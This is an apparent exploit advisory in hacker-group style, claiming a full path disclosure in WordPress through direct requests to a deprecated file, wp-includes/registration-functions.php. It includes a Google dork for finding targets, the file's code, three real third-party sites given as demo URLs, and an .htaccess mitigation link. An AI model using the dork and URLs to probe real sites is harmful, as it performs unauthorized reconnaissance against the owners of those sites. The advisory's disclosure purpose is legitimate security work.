================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
####
# Exploit Title: WordPress all Version full Path Disclosure Vulnerability
[php]
# Author: KinG Of PiraTeS
# GooGle+ : http://goo.gl/5RVFv
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail: [email protected] / [email protected]
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: intext:"powered by WordPress"
# platform : php
# Vendor: http://www.wordpress.com/
# Version: all
# Security Risk : Low ( Only for inforamtion )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####
##
# | >> ——–+++=[ Dz Offenders Cr3w ]=+++——– << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ——> KinG Of PiraTeS * The g0bl!n <——– * |
# | ————————————————- < |
###
#
==============
1)Exploit
=========
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/wp-includes/registration-functions.php
[~] Vuln Code [~] :
—->
<?php
/**
* Deprecated. No longer needed.
*
* @package WordPress
*/
_deprecated_file( basename(__FILE__), ‚2.1‘, null, __( ‚This file no longer needs to be included.‘ ) );
?>
—–>
There is no file to Call from the Function shown below
[~] D3m0 [~] :
=============
http://hotelsandhighways.com/blog/wp-includes/registration-functions.php?nulled=1337day
http://beavory.com/wp-includes/registration-functions.php?nulled=1337day
http://www.chateau-theme.com/wp-includes/registration-functions.php?nulled=1337day
.
.
.
####
Peace From Algeria to Ghaza
####
=================================**Algerians Hackers**===============================================
# Greets To :
KedAns-Dz ,errajol ettayeb -> All Algerians Hackers & All My Friendz <- ,
–> Hanixpo , Indoushka , Jago-dz ,saoucha , BriscO-Dz , Caddy-Dz & kalashinkov3
Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic ,TrOon , Kondamne, Tn_Scorpion , ..others ?___? <—
(exploit-id.com) , (inj3ct0rs.com) , (Sec4ever.com) , (h4ckforu.com) , (dz-root.com) …
=====================================================================================================
# 1337day.com [2012-07-11]WordPress all Version full Path Disclosure Vulnerability
[/php]
Use this .htaccess to protect yourself : http://blog.yakuza112.org/?p=6397
